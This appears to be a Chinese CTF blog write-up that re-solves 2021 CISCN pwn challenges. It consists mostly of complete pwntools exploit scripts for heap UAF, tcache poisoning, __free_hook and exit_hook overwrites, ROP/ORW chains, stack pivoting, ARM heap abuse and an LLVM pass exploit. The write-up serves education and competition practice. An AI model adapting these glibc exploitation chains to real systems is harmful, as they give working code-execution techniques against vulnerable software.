---
title: 2021 ciscn pwn/misc 复现
date: 2022-04-28 23:06:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=15/
pin: false
published:
---
## lonelywolf（UAF打tcache）

这道题漏洞蛮大的，用nowptr和nowptrsize管理最新的一个堆块，四个功能都只对最新堆块进行操作，再加上uaf漏洞，4个功能相当于都没条件检测。思路就是打tcache_struct，泄露libc地址，然后恢复结构体，利用edit功能申请到freehook改system即可

```python
# -*- coding: utf-8 -*-
from pwn import *
p = process('./lonelywolf')
elf = ELF("./lonelywolf")
libc=elf.libc
context.log_level='debug'
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def cmd(choice):
    sla("Your choice: ",choice)

def add(idx,size):
    cmd(1)
    sla("Index: ",idx)
    sla("Size: ",size)

def dele(idx):
    cmd(4)
    sla("Index: ",idx)

def edit(idx,content):
    cmd(2)
    sla("Index: ",idx)
    p.sendlineafter("Content: ",content)

def show(idx):
    cmd(3)
    sla("Index: ",idx)

def dbg():
    gdb.attach(p)
    pause()


add(0,0x8)
dele(0)
edit(0,'a'*8)
# 拿堆地址
show(0)
p.recvuntil("aaaaaaaa")
heap=u64(p.recv(6)+'\x00'*2)-0x10
lg('heap',heap)

edit(0,p64(0))
add(0,0x40)
dele(0)
# # 申请到tcache管理空间，同时恢复tcache结构体功能，保持0x20堆块正常运行
edit(0,p64(heap+0x10))
add(0,0x40)
add(0,0x40)
edit(0,p64(0)*4+p64(0x0000000007000000))# 7即tcache结构体
dele(0)
# # 打到unsortbin后切割获取libc
show(0)
p.recvuntil("Content: ")
libc_base=u64(p.recv(6)+'\x00'*2)-96-0x3EBC40
lg('libc_base',libc_base)
free=libc_base+libc.sym['__free_hook']
sys=libc_base+libc.sym['system']

# # 恢复一下结构体，进行最后的uaf利用
add(0,0x78)
edit(0,p64(0)*4)
dele(0)
edit(0,p64(free-8))
add(0,0x78)
add(0,0x78)
edit(0,"/bin/sh\x00"+p64(sys))
dele(0)

p.interactive()
```

以前的wp

```python
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
from sys import argv

context(os='linux',arch='amd64',log_level='debug')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda data               :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

binary = './lonelywolf'
context.binary = binary
elf = ELF(binary)

p = remote('node3.buuoj.cn',27626) if argv[1]=='r' else process(binary)
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
libc = ELF('/home/ef4tless/glibc-all-in-one/libs/libc-2.27.so',checksec=False)

def ret2libc(func,leak,path=''):
	if path == '':
		libc = LibcSearcher(func,leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search('/bin/sh').next()

	return (system, binsh)

def dbg():
	gdb.attach(p)
	pause()

def add(index,size):
	sla('Your choice: ',1)
	sla('Index: ',index)
	sla('Size: ',size)

def free(index):
	sla('Your choice: ',4)
	sla('Index: ',index)

def edit(index,content):
	sla('Your choice: ',2)
	sla('Index: ',index)
	sla('Content: ',content)

def show(index):
	sla('Your choice: ',3)
	sla('Index: ',index)

# start
add(0,0x78)
free(0)
edit(0,'a'*0x10)
free(0)
show(0)
p.recvuntil("Content: ")
heap_base = u64(p.recv(6).ljust(8,"\x00")) - 0x260 + 0x10
lg('heap_base',heap_base)
edit(0,p64(heap_base)+p64(0))
add(0,0x78)
add(0,0x78)
edit(0,"\xff"*0x78)
free(0)
show(0)
p.recvuntil("Content: ")
malloc_hook = u64(p.recv(6).ljust(8,"\x00")) - 96 - 0x10 
lg('malloc_hook',malloc_hook)
libc_base = malloc_hook - libc.sym['__malloc_hook']
one_gadget = libc_base + 0x10a41c
free_hook = libc_base + libc.sym['__free_hook']
lg('one_gadget',one_gadget)
edit(0,'\x03'+'\x00'*0x3f+p64(free_hook))
add(0,0x18)
edit(0,p64(one_gadget))
free(0)
# end
p.interactive()
```
## pwny(exit_hook利用/数组越界读写)

法一：

利用write功能去改read函数的fd，当fd为一个随机大数时，读入是0，所以这里读入2次，fd就变成0。因为数组越界，我们能任意地址读写，那这里用覆盖exit_hook为one_gadget的方式。

这里提一下找exit_hook的方式

```
p &_rtld_global._dl_rtld_lock_recursive
```

```python
# libc-2.23.so
exit_hook = libc_base + 0x5f0040 + 3848
exit_hook = libc_base + 0x5f0040 + 3856

# libc-2.27.so          #这个值因libc不同可能不同
exit_hook = libc_base + 0x619060 + 3840# lock
exit_hook = libc_base + 0x619060 + 3848# unlock
```

```python
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = process('./pwny')
libc = ELF('./libc-2.27.so')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def read(idx):
    sla('Your choice: ',1)
    p.sendafter('Index: ',str(idx))


sla('Your choice: ',2)
sla('Index: ',str(0x100))

sla('Your choice: ',2)
sla('Index: ',str(0x100))

read(p64((0xffffffffffffffff-8+1)))
p.recvuntil("Result: ")
libc_base = int(p.recv(12),16)-0x3EC760
lg('libc_base',libc_base)

read(p64((-11)&0xffffffffffffffff))# exit_got的地址，主要用于算偏移，其他能泄露的值也可以
ru('Result: ')
pie_base= int(p.recv(12),16)-0x202008
lg('pie_base',pie_base)
ptr = 0x202060+pie_base
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
one = 0x4f432+libc_base
lg('one',one)
#_rtld_global
exit_hook = libc_base + 0x61b060+ 3848
lg('exit_hook',exit_hook)

sla('Your choice: ',2)
sla('Index: ',(exit_hook-ptr)/8)
p.sendline(p64(one))
sla('Your choice: ',3)

p.interactive()
```

法二：

64位保护全开，栈题
有read 和 write 2个函数，只有write可用，fd是随机值，导致read函数不能正常运行

从write入手，先输入一个值作为数组下标，然后再往这个数组位置读入一个值
观察发现可以数组溢出，那就溢出改掉fd的值，让它变为标准输入流，由我们自己输入值。256正好是fd的位置，write两次fd就被改成0了。

然后就是泄露地址，首先是libc基址，我们现在有了任意地址读和任意地址写的能力，那就用read的功能泄露stdout的地址，这样就能算出libc_base了
还要泄露程序基址，选了sub_9C0这个函数，同样用read读出函数地址，减0X9C0后得到程序基地址，然后再加上0x202060的偏移就是ptr数组的真实地址
最后是泄露栈地址，利用environ函数，这个函数里面储存了栈地址，加上libc_base用read读出这个栈地址，再gdb调试，找到距离ret的偏移，就得到ret的栈地址，然后onegadget覆盖。

```python
# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
from sys import argv

context(os='linux',arch='amd64',log_level='debug')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

binary = './pwny'
context.binary = binary
elf = ELF(binary)

p = remote('node3.buuoj.cn',27626) if argv[1]=='r' else process(binary)
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
libc = ELF('./libc-2.27.so',checksec=False)

def ret2libc(func,leak,path=''):
	if path == '':
		libc = LibcSearcher(func,leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search('/bin/sh').next()

	return (system, binsh)

def dbg():
	gdb.attach(p)
	pause()

def read(index):
	sla('Your choice: ',1)
	sla('Index: ',str(index))

def write(index):
	sla('Your choice: ',2)
	sla('Index: ',str(index))
# start
def calc(s):
	if s > 0:
		return s
	else:
		s = 0xffffffffffffffff + s + 1 
        return s

write(256)
write(256)
#libc_addr
read(p64(calc(-8)))
ru('Result: ')
stdout_addr = int(p.recvuntil('\n'),16)
lg('stdout_addr',stdout_addr)
libc_base = stdout_addr - libc.sym['_IO_2_1_stdout_']
lg('libc_base',libc_base)
one_gadget = 0x10a41c+libc_base

#bss_addr
read(p64(calc((0x201D88-0X202060)//8)))
p.recvuntil('Result: ')
bss_addr = int(p.recvuntil("\n"),16) - 0x9C0 + 0x202060
lg('bss_addr',bss_addr)

#stack_addr
environ = libc_base + libc.sym['environ']
read(p64(calc((environ-bss_addr)//8)))
p.recvuntil('Result: ')
stack_ret_addr = int(p.recvuntil("\n"),16) - 0x120
lg('stack_ret_addr',stack_ret_addr)

write((stack_ret_addr-bss_addr)//8)
p.sendline(p64(one_gadget))
# end
p.interactive()
```
## game(特殊数组越界实现堆溢出)

具体讲解在[VMpwn总结](https://www.e4l4.com/2022/040863377.html)，这里贴一下exp

```python
from pwn import*
context.log_level = 'DEBUG'

def RUN(payload):
    p.sendlineafter('cmd> ',str(payload))

def init(L,W):
    RUN( 'OP:' + '1' + '\n' + 'L:' + str(L) + '\n' +  'W:' + str(W) + '\n')
def create(ID,Size,des):
    RUN( 'OP:' + '2' + '\n' + 'ID:' + str(ID) + '\n' +  's:' + str(Size) + '\n')
    p.sendafter('desc> ',des)
def free(ID):
    RUN( 'OP:' + '3' + '\n' + 'ID:' + str(ID) + '\n')
def show():
    RUN( 'OP:' + '4' + '\n')
def up(ID):
    RUN( 'OP:' + '5' + '\n' + 'ID:' + str(ID) + '\n')
def down(ID):
    RUN( 'OP:' + '6' + '\n' + 'ID:' + str(ID) + '\n')
def left(ID):
    RUN( 'OP:' + '7' + '\n' + 'ID:' + str(ID) + '\n')
def right(ID):
    RUN( 'OP:' + '8' + '\n' + 'ID:' + str(ID) + '\n')
def dbg():
    gdb.attach(p)
    pause()

p = process('./game')
elf = ELF("./game")
libc =ELF("libc-2.27.so")

# 利用越界泄露libc和堆地址
init(0x10,0x10)
create(6,0x3F0,'E4L4')
right(6)# 修改size
right(6)
for i in range(10):
    down(0x6)
create(0x99,0x3F0,'\x00'*0x1F8 + p64(0x201))
free(6)# 0x400的chunk
create(1,0x380,'\xA0')# 申请回来拿libc
show()
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x70- 0x500
log.info('LIBC:\t' + hex(libc_base))
create(9,0x10,'\xA0')# 申请回来拿libc
show()
p.recvuntil('9: (10,12) ')
heap_base = u64(p.recv(6).ljust(8,'\x00')) - 0xDA0  - 0x1400
log.info('HEAP:\t' + hex(heap_base))

# 修改fd申请tcache_struct（因为沙箱的原因需要我们恢复tcache结构）
free(0x99)# 0x400的chunk
create(2,0x230,'\x00'*0x38 + p64(0x401) + p64(heap_base + 0x10))

# orw
###################
pop_rdi_ret = libc_base + 0x000000000002155f
pop_rdx_ret = libc_base + 0x0000000000001b96
pop_rax_ret = libc_base + 0x0000000000043a78
pop_rsi_ret = libc_base + 0x0000000000023e8a
ret = libc_base + 0x00000000000008AA
Open = libc_base + libc.sym['open']
Read = libc_base + libc.sym['read']
Write = libc_base + libc.sym['write']
syscall = Read + 15
FLAG  = heap_base + 0x10 + 0xA0 + 0x10 + 0x88

orw  = p64(pop_rdi_ret) + p64(FLAG)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rax_ret) + p64(2)# open
orw += p64(syscall)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rsi_ret) + p64(heap_base  + 0x3000)
orw += p64(pop_rdx_ret) + p64(0x30)
orw += p64(Read)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(Write)
###################
# 操作tcache_struct修改freehook为setcontext+53，并利用
create(7,0x3F0,'E4L4')
create(8,0x3F0,'\x00'*7 + '\x01' + '\x00'*0x38 +'\x00'*8*7 + p64(libc_base + libc.sym['__free_hook'])  + '\x00'*0x20 + p64(heap_base + 0x10 + 0xA0 + 0x10) + p64(pop_rdi_ret + 1) + orw + 'flag\x00')
log.info('setc:\t' + hex(libc_base + libc.sym['setcontext'] + 53))
create(3,0x80,p64(libc_base + libc.sym['setcontext'] + 53))

free(8)
p.interactive()
```

## channel(arm架构堆UAF)

![image-20220415105925516](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220415105925516.png)

arm架构的题调试比较麻烦，以这道题为例

基地址0x4000000000，gdb调试没办法vmmap/bin/parseheap，一开始定位堆地址靠在read下断点得到，后续看程序流程就在每个功能的结束点下断点，来进行调试

漏洞就是一个UAF，思路还是打tcache_struct，这里利用引索链接上tcache_struct，然后直接用edit功能；这里这个exp的解法主要就是利用了这道题的一个**链式结构体管理，类比tcachebin，plt去伪造**

```python
from pwn import *
context.log_level = 'DEBUG'

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def menu(idx):
    p.sendlineafter("> ",str(idx))
        
def add(key):
    menu(1)
    p.sendafter("key> ",key)
    
def dele(key):
    menu(2)
    p.sendafter("key> ",key)

def show(key):
    menu(3)
    p.sendafter("key> ",key)

def edit(key,len_,content):
    menu(4)
    p.sendafter("key> ",key)
    p.sendafter("len> ",str(len_))
    p.sendafter("content> ",content)

libc = ELF("./lib/libc.so.6")
p = process("./qemu-aarch64-static -L ./ -g 1236 ./channel".split())

# 泄露堆地址
add("chunk3")
add("chunk2")
add("chunk1")
dele("chunk1")
dele("chunk2")
edit("chunk3",0x110,"A")# chunk3(chunk2)
show("chunk3")
base = 0x4000000000
p.recvuntil("\n")
heap = u64(p.recvuntil("\n")[:-1].ljust(8,"\x00")) - 0x41 + base
info("heap : " + hex(heap))

# 泄露libc
add("chunk4")# 4-1
dele("chunk3")# 会清空
# 伪造虚拟附属堆块
read_got = 0x11F78
fake_chunk = "\x00"*8+p64((heap&0xfffffffffffff000)+0x10)
fake_chunk += p64(base+read_got)
fake_chunk = fake_chunk.ljust(0x100,"\x00")+p64(0)+p64(heap-0x150+0x10) # local
# fake_chunk = fake_chunk.ljust(0x100,"\x00")+p64(0)+p64(heap-0x160+0x10) # remote
edit("chunk4",0x110,fake_chunk)# chunk4(chunk3)
show(fake_chunk[:0x100])# chunk3“(read_got)”利用类plt引索
p.recvuntil("\n")
read_addr = u64(p.recvuntil("\n")[:-1].ljust(8,"\x00")) + base
info("read_addr : " + hex(read_addr))
libc.address = read_addr - libc.sym["read"]

# 打tcache_struct，控制tcache->fd
for i in range(5):
    add(str(i))
for i in range(5):
    dele(str(4-i))

dele(fake_chunk[:0x100])# chunk3
fake_chunk = "\x00"*0x100
fake_chunk += p64((heap&0xfffffffffffff000)+0x8)
edit("chunk4",0x110,fake_chunk)# chunk4(chunk3) 布置引索

key = p64(0x0000000000000291)
key += p64(0)*4
key += p64(0x0000000000000005)
key += p64(0)*10
key += p64(0x0001000000000000)    # local 本地调试时这里stdin开辟了0x410的堆
#key += p64(0)       # remote
key += p64(0)*15
# 引索到tcache_struct，设置0x120bin头节点为tcache_struct的中间chunk，同时设置一个附属chunK放入freehook,
info("__free_hook : " + hex(libc.sym["__free_hook"]))
edit(key,0x1e0,p64(libc.sym["__free_hook"]))# 利用y
# 中间chunk->附属chunk->free_hook
edit("chunk4",0x110,p64(0)*3+p64(0x00000000000fedf1))
add("/bin/sh\x00")
edit("chunk4",0x110,p64(libc.sym["system"]))
dele("/bin/sh\x00")
p.interactive()
```

## silverwolf(2.27/堆栈转移)

漏洞点是UAF，最大能申请0x78的size，常规思路是覆盖free_hook写setcontext，其实就是去执行写在堆里的gadget，但这道题因为editsize即chunksize，我们用setcontext+srop长度就不够，SigreturnFrame这种都是0xf8往上的，如果硬要在堆里写就需要拼接了。

**这里在堆题里用到栈的思想，前置条件是任意地址申请（控制tcache_struct等）。在edit功能结束时会ret，那我们申请堆块到这里的栈空间然后设置ret就可以d达到一个执行gadget的目的**

```python
# -*- coding: utf-8 -*-
from pwn import *

p = process('./silverwolf')
elf = ELF("./silverwolf")
libc=elf.libc
context.log_level='debug'
context.arch="amd64"
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def cmd(choice):
    sla("Your choice: ",choice)

def add(idx,size):
    cmd(1)
    sla("Index: ",idx)
    sla("Size: ",size)

def dele(idx):
    cmd(4)
    sla("Index: ",idx)

def edit(idx,content):
    cmd(2)
    sla("Index: ",idx)
    p.sendlineafter("Content: ",content)

def show(idx):
    cmd(3)
    sla("Index: ",idx)

def dbg():
    gdb.attach(p)
    pause()

# 拿堆地址
add(0,0x8)
dele(0)
edit(0,'a'*8)
show(0)
p.recvuntil("aaaaaaaa")
heap=u64(p.recv(6)+'\x00'*2)-0x10
lg('heap',heap)
edit(0,p64(0))

# 打tcache_struct到unsortbin后获取libc
add(0,0x78)
dele(0)
edit(0,p64(heap+0x10))
add(0,0x78)
add(0,0x78)
edit(0,p64(0)*4+p64(0x0000000007000000))# 7即tcache结构体
dele(0)
show(0)
p.recvuntil("Content: ")
libc_base=u64(p.recv(6)+'\x00'*2)-96-0x3EBC40
lg('libc_base',libc_base)
setcontext= libc_base + libc.symbols['setcontext']+53
free_hook=libc_base+libc.sym['__free_hook']
syscall= libc_base+next(libc.search(asm("syscall\nret")))
pop_rdi_ret = libc_base+libc.search(asm("pop rdi\nret")).next()
pop_rsi_ret = libc_base+libc.search(asm("pop rsi\nret")).next()
pop_rdx_ret = libc_base+libc.search(asm("pop rdx\nret")).next()
pop_rax_ret = libc_base+libc.search(asm("pop rax\nret")).next()
pop_rsp_ret = libc_base+libc.search(asm("pop rsp\nret")).next()
fake_rsp = free_hook&0xfffffffffffff000

# 泄露栈地址
edit(0,'\x01'*0x60+p64(libc_base+libc.sym["environ"])+p64(libc_base+libc.sym["environ"])+p64(heap+0x10))
add(0,0x68)
show(0)
ru("Content: ")
stack_addr = u64(p.recv(6).ljust(8,"\x00"))
lg("stack_addr",stack_addr)

# 布局申请栈堆
add(0,0x78)
edit(0,'\x01'*0x60+p64(heap+0x10)+p64(libc_base+libc.sym["environ"])+p64(stack_addr-0x120))
add(0,0x78)
payload = p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_ret)+p64(fake_rsp)
payload += p64(pop_rdx_ret)+p64(0x1000)+p64(pop_rax_ret)+p64(0)+p64(syscall)+p64(pop_rsp_ret)+p64(fake_rsp)
edit(0,payload)
# orw
payload = [
    pop_rdi_ret,
    fake_rsp+0x100,
    pop_rsi_ret,
    0,
    pop_rdx_ret,
    0,
    pop_rax_ret,
    2,
    syscall,
    pop_rdi_ret,
    3,
    pop_rsi_ret,
    fake_rsp+0x200,
    pop_rdx_ret,
    0x200,
    pop_rax_ret,
    0,
    syscall,
    pop_rdi_ret,
    1,
    pop_rsi_ret,
    fake_rsp+0x200,
    pop_rdx_ret,
    0x100,
    pop_rax_ret,
    1,
    syscall
]
p.sendline(flat(payload).ljust(0x100,"a")+"flag\x00\x00\x00\x00")

p.interactive()
```

## SAPass(llvm pass)

详细原理这里贴2篇文章，这里只讲pwn题的利用

[LLVM PASS PWN - 安全客，安全资讯平台 (anquanke.com)](https://www.anquanke.com/post/id/240748#h2-10)

[(12条消息) CTF$LLVM PWN学习_Azly的博客-CSDN博客](https://blog.csdn.net/qq_39948058/article/details/119938973)

把SAPass.so放入IDA，去找虚表

![image-20220415234850561](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220415234850561.png)

![image-20220415235018245](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220415235018245.png)

![image-20220415235043380](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220415235043380.png)

简要分析一下功能

![image-20220415235339314](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220415235339314.png)

save功能，2个参数，主要就是开辟一个堆块，存到bss段，顺序赋2个值

这里字符串比对，辨别函数

![image-20220415235527842](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220415235527842.png)

==几就几个参数

![image-20220415235513219](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220415235513219.png)

![image-20220415235437173](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220415235437173.png)

类似这样的方式可以分析出其它几个函数的功能，具体在exp中

这里引用一下fmyy师傅的exp

功能如下，漏洞利用即申请堆块，直到申请切割unsortbin，利用chunk上残留的libc地址mainarena+96，加上偏移得到one_gadget，再run执行

```c
// clang -emit-llvm -o test.bc -c code.c
/*
run:        call *0x2040F8()
stealkey:   0x204100 = *0x2040F8
takeaway:   clear the 0x2040F8
save(char *s1,char *s2):
    memcpy(&P[0],s1,strlen(s1));
    memcpy(&P[1],s2,strlen(s2));
fakekey:    set *0x2040F8 = 0x204100 + SetEXTValue
*/
#include <stdio.h>

int B4ckDo0r()
{
        save("FMYY","FMYY");
        save("FMYY","FMYY");
        save("FMYY","FMYY");
        save("FMYY","FMYY");
        save("FMYY","FMYY");
        save("\x00","FMYY");
        stealkey();
        fakekey(-0x2E1884);
        run();

}
int run()
{
    return 0;
}
int save(char *s1,char *s2)
{
    return 0;
}
int fakekey(int64)
{
    return 0;
}
int takeaway(char *s1)
{
    return 0;
}
int main()
{
    B4ckDo0r();
}
```

## 总结

总的来说国赛的题考的点都很合理，21年的国赛基本都是libc2.27下的，两道数组越界，三道UAF，其中一道沙盒，最后一道llvmpass。难度适中，但大大小小都考了，不偏也不怪，比较吃基本功，有学到很多东西。
